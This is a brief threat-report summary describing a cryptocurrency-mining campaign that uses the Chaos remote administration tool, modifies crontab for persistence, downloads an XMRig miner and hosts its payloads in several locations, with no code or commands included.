A cryptocurrency mining operation was discovered incorporating the Chaos Remote Administrative Tool into its arsenal.
The malicious software alters the crontab file to maintain persistence and downloads an XMRig miner onto infected devices.
To remain active and spread to as many devices as possible the main downloader script and further payloads are hosted in different locations.